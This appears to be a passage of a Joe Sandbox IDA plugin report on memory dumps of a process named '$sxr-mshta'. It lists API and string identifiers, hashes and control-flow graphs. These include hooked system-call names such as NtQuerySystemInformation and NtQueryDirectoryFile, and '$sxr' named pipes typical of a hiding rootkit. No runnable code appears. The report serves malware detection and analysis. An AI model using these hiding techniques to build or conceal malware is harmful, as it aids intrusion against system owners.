                                                                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$Sysprep_Clean_Validate_Opk$advapi32.dll$ntdll.dll$sechost.dll$spopk.dll
                                                                                                                      • API String ID: 1741086925-759476645
                                                                                                                      • Opcode ID: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                                      • Instruction ID: b10a1bb16b804796ac25ab0e497a0749f51296e555e1ebb15830f49bd306616e
                                                                                                                      • Opcode Fuzzy Hash: fdb9ee048accc148592a3936cc90690a843ff47089991e14ccff5ee3cdc74a61
                                                                                                                      • Instruction Fuzzy Hash: 1E4193BA313D0BE1EA06DF55EB55BD4AB24A70F3C4F814413B4094E166FF78828AC352
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 2005889112-2564639436
                                                                                                                      • Opcode ID: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                                      • Instruction ID: 692739381c7e69450caaf21e8976dd9f48ebe503361453cb39051215321206d6
                                                                                                                      • Opcode Fuzzy Hash: 6bcc7a94b8732a062315a7af28d29bd62de89db6d10a7923a3b74cbbd2f289e1
                                                                                                                      • Instruction Fuzzy Hash: A9517872315F45D7EB15CF62E64879AB7A1F38ABD0F058226EA490BB14EF38C055CB05
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                      • String ID: \\.\pipe\$sxrchildproc34226543a32$\\.\pipe\$sxrchildproc38764243a64
                                                                                                                      • API String ID: 2171963597-1213686612
                                                                                                                      • Opcode ID: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                                      • Instruction ID: ab226fb4db7a5a2f880efd12113e4cfc828a68b77041f9fe88609f9da7ee3fd9
                                                                                                                      • Opcode Fuzzy Hash: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                                      • Instruction Fuzzy Hash: F6219032715B4182EB118F21E604799BBA0F38BBE4F504212FA5946BA8EF3CC149CB01
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                                      • Opcode ID: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                                      • Instruction ID: 4e7cd0df4eb4bfa36b0e6cc546b170ab78fdfa493660d1216b5c7bf1b5fdc7e4
                                                                                                                      • Opcode Fuzzy Hash: 3405b6d6aca030105382ba4e18177f2fb021de4e8f3198299b80cfe6290b74ba
                                                                                                                      • Instruction Fuzzy Hash: 7E418233215B80DBE7618F61E5447DAB7A1F38ABD4F008126EB990BB58EF38D165CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 423 1a00aad6a90-1a00aad6a96 424 1a00aad6a98-1a00aad6a9b 423->424 425 1a00aad6ad1-1a00aad6adb 423->425 427 1a00aad6a9d-1a00aad6aa0 424->427 428 1a00aad6ac5-1a00aad6b04 call 1a00aad7140 424->428 426 1a00aad6bf8-1a00aad6c0d 425->426 432 1a00aad6c1c-1a00aad6c36 call 1a00aad6fd4 426->432 433 1a00aad6c0f 426->433 430 1a00aad6ab8 __scrt_dllmain_crt_thread_attach 427->430 431 1a00aad6aa2-1a00aad6aa5 427->431 446 1a00aad6b0a-1a00aad6b1f call 1a00aad6fd4 428->446 447 1a00aad6bd2 428->447 435 1a00aad6abd-1a00aad6ac4 430->435 437 1a00aad6aa7-1a00aad6ab0 431->437 438 1a00aad6ab1-1a00aad6ab6 call 1a00aad7084 431->438 444 1a00aad6c6f-1a00aad6ca0 call 1a00aad7310 432->444 445 1a00aad6c38-1a00aad6c6d call 1a00aad70fc call 1a00aad6f9c call 1a00aad7498 call 1a00aad72b0 call 1a00aad72d4 call 1a00aad712c 432->445 439 1a00aad6c11-1a00aad6c1b 433->439 438->435 455 1a00aad6cb1-1a00aad6cb7 444->455 456 1a00aad6ca2-1a00aad6ca8 444->456 445->439 458 1a00aad6bea-1a00aad6bf7 call 1a00aad7310 446->458 459 1a00aad6b25-1a00aad6b36 call 1a00aad7044 446->459 450 1a00aad6bd4-1a00aad6be9 447->450 461 1a00aad6cfe-1a00aad6d14 call 1a00aad28f0 455->461 462 1a00aad6cb9-1a00aad6cc3 455->462 456->455 460 1a00aad6caa-1a00aad6cac 456->460 458->426 476 1a00aad6b38-1a00aad6b5c call 1a00aad745c call 1a00aad6f8c call 1a00aad6fb8 call 1a00aad917c 459->476 477 1a00aad6b87-1a00aad6b91 call 1a00aad72b0 459->477 466 1a00aad6d9f-1a00aad6dac 460->466 479 1a00aad6d4c-1a00aad6d4e 461->479 480 1a00aad6d16-1a00aad6d18 461->480 467 1a00aad6ccf-1a00aad6cdd call 1a00aae2768 462->467 468 1a00aad6cc5-1a00aad6ccd 462->468 473 1a00aad6ce3-1a00aad6cf8 call 1a00aad6a90 467->473 490 1a00aad6d95-1a00aad6d9d 467->490 468->473 473->461 473->490 476->477 526 1a00aad6b5e-1a00aad6b65 __scrt_dllmain_after_initialize_c 476->526 477->447 499 1a00aad6b93-1a00aad6b9f call 1a00aad7300 477->499 488 1a00aad6d55-1a00aad6d6a call 1a00aad6a90 479->488 489 1a00aad6d50-1a00aad6d53 479->489 480->479 487 1a00aad6d1a-1a00aad6d3c call 1a00aad28f0 call 1a00aad6bf8 480->487 487->479 520 1a00aad6d3e-1a00aad6d46 call 1a00aae2768 487->520 488->490 508 1a00aad6d6c-1a00aad6d76 488->508 489->488 489->490 490->466 510 1a00aad6bc5-1a00aad6bd0 499->510 511 1a00aad6ba1-1a00aad6bab call 1a00aad7218 499->511 514 1a00aad6d78-1a00aad6d7f 508->514 515 1a00aad6d81-1a00aad6d91 call 1a00aae2768 508->515 510->450 511->510 525 1a00aad6bad-1a00aad6bbb 511->525 514->490 515->490 520->479 525->510 526->477 527 1a00aad6b67-1a00aad6b84 call 1a00aad9118 526->527 527->477
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917423134.000001A00AAD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001A00AAD0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00aad0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 190073905-0
                                                                                                                      • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction ID: f6a1e1a64f6c52bf56c9c88361415ff2a0d919872d0a9d9d73517389ecc8422f
                                                                                                                      • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction Fuzzy Hash: 8B81DF7172264146FB57AB25AB413D923A1A78F7C4F088726BAC647FD6DB38C8C58703
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 530 1a00bdb7690-1a00bdb7696 531 1a00bdb7698-1a00bdb769b 530->531 532 1a00bdb76d1-1a00bdb76db 530->532 533 1a00bdb769d-1a00bdb76a0 531->533 534 1a00bdb76c5-1a00bdb7704 call 1a00bdb7d40 531->534 535 1a00bdb77f8-1a00bdb780d 532->535 536 1a00bdb76b8 __scrt_dllmain_crt_thread_attach 533->536 537 1a00bdb76a2-1a00bdb76a5 533->537 550 1a00bdb770a-1a00bdb771f call 1a00bdb7bd4 534->550 551 1a00bdb77d2 534->551 538 1a00bdb780f 535->538 539 1a00bdb781c-1a00bdb7836 call 1a00bdb7bd4 535->539 546 1a00bdb76bd-1a00bdb76c4 536->546 542 1a00bdb76b1-1a00bdb76b6 call 1a00bdb7c84 537->542 543 1a00bdb76a7-1a00bdb76b0 537->543 544 1a00bdb7811-1a00bdb781b 538->544 553 1a00bdb7838-1a00bdb786d call 1a00bdb7cfc call 1a00bdb7b9c call 1a00bdb8098 call 1a00bdb7eb0 call 1a00bdb7ed4 call 1a00bdb7d2c 539->553 554 1a00bdb786f-1a00bdb78a0 call 1a00bdb7f10 539->554 542->546 562 1a00bdb77ea-1a00bdb77f7 call 1a00bdb7f10 550->562 563 1a00bdb7725-1a00bdb7736 call 1a00bdb7c44 550->563 555 1a00bdb77d4-1a00bdb77e9 551->555 553->544 564 1a00bdb78a2-1a00bdb78a8 554->564 565 1a00bdb78b1-1a00bdb78b7 554->565 562->535 583 1a00bdb7738-1a00bdb775c call 1a00bdb805c call 1a00bdb7b8c call 1a00bdb7bb8 call 1a00bdb9d7c 563->583 584 1a00bdb7787-1a00bdb7791 call 1a00bdb7eb0 563->584 564->565 570 1a00bdb78aa-1a00bdb78ac 564->570 571 1a00bdb78b9-1a00bdb78c3 565->571 572 1a00bdb78fe-1a00bdb7903 565->572 579 1a00bdb799f-1a00bdb79ac 570->579 573 1a00bdb78cf-1a00bdb78dd call 1a00bdc3368 571->573 574 1a00bdb78c5-1a00bdb78cd 571->574 578 1a00bdb7906 call 1a00bdb34f0 572->578 580 1a00bdb78e3-1a00bdb78f8 call 1a00bdb7690 573->580 595 1a00bdb7995-1a00bdb799d 573->595 574->580 585 1a00bdb790b-1a00bdb7914 578->585 580->572 580->595 583->584 632 1a00bdb775e-1a00bdb7765 __scrt_dllmain_after_initialize_c 583->632 584->551 603 1a00bdb7793-1a00bdb779f call 1a00bdb7f00 584->603 591 1a00bdb794c-1a00bdb794e 585->591 592 1a00bdb7916-1a00bdb7918 585->592 593 1a00bdb7950-1a00bdb7953 591->593 594 1a00bdb7955-1a00bdb796a call 1a00bdb7690 591->594 592->591 600 1a00bdb791a-1a00bdb791f 592->600 593->594 593->595 594->595 612 1a00bdb796c-1a00bdb7976 594->612 595->579 605 1a00bdb7922 call 1a00bdb34f0 600->605 620 1a00bdb77a1-1a00bdb77ab call 1a00bdb7e18 603->620 621 1a00bdb77c5-1a00bdb77d0 603->621 611 1a00bdb7927-1a00bdb793c call 1a00bdb77f8 605->611 611->591 624 1a00bdb793e-1a00bdb7946 call 1a00bdc3368 611->624 617 1a00bdb7978-1a00bdb797f 612->617 618 1a00bdb7981-1a00bdb7991 call 1a00bdc3368 612->618 617->595 618->595 620->621 633 1a00bdb77ad-1a00bdb77bb 620->633 621->555 624->591 632->584 634 1a00bdb7767-1a00bdb7784 call 1a00bdb9d18 632->634 633->621 634->584
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 190073905-0
                                                                                                                      • Opcode ID: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction ID: 991759b8c839dfd8723ac9faaf9260e70b50ca09e76899cdacf9244bbbb1fa12
                                                                                                                      • Opcode Fuzzy Hash: b902a8228d0a566df5327651209e30a0b1120f59ef4b7f207320f33e0dc57618
                                                                                                                      • Instruction Fuzzy Hash: 14819C30706E42C7FA569F669A41BD9E691ABCF7C0F064427B9088F796FB38CC418706
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                      • String ID: api-ms-
                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                      • Opcode ID: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                                      • Instruction ID: 4169dbb03fa2d6595903e1f8eeeddba1abd77cf4161ab39a284232f04e31bf25
                                                                                                                      • Opcode Fuzzy Hash: b9fc0f4bc552b3b3a9613ae8c221c9ea50584cfdf87ea6a2e8fae9693c69d0a1
                                                                                                                      • Instruction Fuzzy Hash: CB316F31313E91D1EE539F129550BD9A394BB4FBE0F5A5526BE194E344FF38C4458312
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                      • String ID: CONOUT$
                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                      • Opcode ID: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                                      • Instruction ID: 1024b168949dea4e5982153c9c03b1275ad0d31baafafafb68ec3efb7de548d6
                                                                                                                      • Opcode Fuzzy Hash: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                                      • Instruction Fuzzy Hash: F7118B32311F4186E7528F46EA44399EAA0F78FBE4F008226FA1D8B794EF38C814C745
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$Current$Context
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1666949209-0
                                                                                                                      • Opcode ID: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                                      • Instruction ID: bd97341ad54c0d057f0d2b5a1a53f6d717d439d543e09bfa160b299a117a6a37
                                                                                                                      • Opcode Fuzzy Hash: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                                      • Instruction Fuzzy Hash: 25D1BC36209F48C6DA719F1AE59079AB7A0F3DEBC8F110116EA8D4B7A5DF38C541CB05
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                                      • String ID: $sxr
                                                                                                                      • API String ID: 756756679-21942930
                                                                                                                      • Opcode ID: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                                      • Instruction ID: 33eb3282b218c19cc78fa336cd433ee6a73873a1329783a7bb5af254aea10028
                                                                                                                      • Opcode Fuzzy Hash: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                                      • Instruction Fuzzy Hash: B4319131702F51C6E7169F56AA40BA9B7A0FB4BBE4F098022AF490BB54FF38C4658705
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917958810.00007FF7142F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7142F0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917829662.00007FF7142F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      • Associated: 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      • Associated: 0000000D.00000002.2918191653.00007FF7142F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_7ff7142f0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104442557-0
                                                                                                                      • Opcode ID: 3aee56793f856ebc4bf5ed15d236b07679841bd6bfcb628e62788a85eda43e84
                                                                                                                      • Instruction ID: 1e0d3b01b18e3688dbf7abcd0e9e32befc408565b2e96a9a683a8969ea94d6fa
                                                                                                                      • Opcode Fuzzy Hash: 3aee56793f856ebc4bf5ed15d236b07679841bd6bfcb628e62788a85eda43e84
                                                                                                                      • Instruction Fuzzy Hash: 00116322604F418AEB00EF71E8842A973E4FB0B768FC00A35EA5D47754DF7DD5A88350
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 517849248-0
                                                                                                                      • Opcode ID: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                                      • Instruction ID: 0d3655745c4bd35511f8e0446bd8bdc0053fb94c230b7bf30974b846344ff083
                                                                                                                      • Opcode Fuzzy Hash: dd2bb52e115c473e0f8e08ec62385b9b1bc9a7885310831d85afcbe291b8297d
                                                                                                                      • Instruction Fuzzy Hash: C0015B31301F4296EA11DF12A558799A7A1FB8EFD0F488036EE894B754EF38C986C749
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 449555515-0
                                                                                                                      • Opcode ID: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                                      • Instruction ID: e5c9743fec3e8dea7fb27fc985ab4ff0a34a921c802a436df98a624ccde7c64f
                                                                                                                      • Opcode Fuzzy Hash: 4f9aa0d141a117e5b28f836a31fda0da5fbbd9299a6c1a47c4e907238d40991d
                                                                                                                      • Instruction Fuzzy Hash: 5E113C79702F4186FB669F25E6487A5B7A0BB4FBD1F044426E9490A354FF3DC008D706
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                      • String ID: csm$f
                                                                                                                      • API String ID: 2395640692-629598281
                                                                                                                      • Opcode ID: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                                      • Instruction ID: 88d2c35e27e07476da248665ea38b5e5c73228512c8fa663cb3dae108a44664b
                                                                                                                      • Opcode Fuzzy Hash: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                                      • Instruction Fuzzy Hash: 76518F32712E80CAEB16CF15E654F99B795F38BBD4F568126EB064B788EB38C841C705
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                                                                      • String ID: \\?\
                                                                                                                      • API String ID: 2719912262-4282027825
                                                                                                                      • Opcode ID: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                                      • Instruction ID: 2dae5752eb1238cd66e2d1fbdd6d7ba0a15588768efd58fc291d8b502ad4714a
                                                                                                                      • Opcode Fuzzy Hash: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                                      • Instruction Fuzzy Hash: B8F08172311E41D2E7618F10E6947D9AB60F74BBD8F848022EA494A554EF3CC688C705
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CombinePath
                                                                                                                      • String ID: \\.\pipe\
                                                                                                                      • API String ID: 3422762182-91387939
                                                                                                                      • Opcode ID: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                                      • Instruction ID: 6f60aa4ffd1176d1df739e549224c5cb99eed977b7a2ef41b620533890ea14b8
                                                                                                                      • Opcode Fuzzy Hash: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                                      • Instruction Fuzzy Hash: 1AF05E70306F92D1EA018F53BA15299E621EB4FFE0F048132FE460BB28EE38C481C309
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                      • Opcode ID: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                                      • Instruction ID: ec7c768757244c4dacb1848278a7ed87cfb55973578f730c9e72d42b3f095e36
                                                                                                                      • Opcode Fuzzy Hash: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                                      • Instruction Fuzzy Hash: 63F03A71722F4191EF464F60E6947A4BB60AB4FBD0F44602AA90B4A260EF38C499CB02
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000D.00000002.2917564748.000001A00BDB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A00BDB0000, based on PE: true
                                                                                                                      • Associated: 0000000D.00000002.2917564748.000001A00BDD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_13_2_1a00bdb0000_$sxr-mshta.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2882836952-0
                                                                                                                      • Opcode ID: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                                      • Instruction ID: 067530421aa415b3e426a8bb6027a005a3838962278c79eaf6e263697cb1c13f
                                                                                                                      • Opcode Fuzzy Hash: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                                      • Instruction Fuzzy Hash: 5002C83221AB84C6E761CF55F59079AB7A0F3DA784F114116FA8E87BA8EF79C444CB01
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
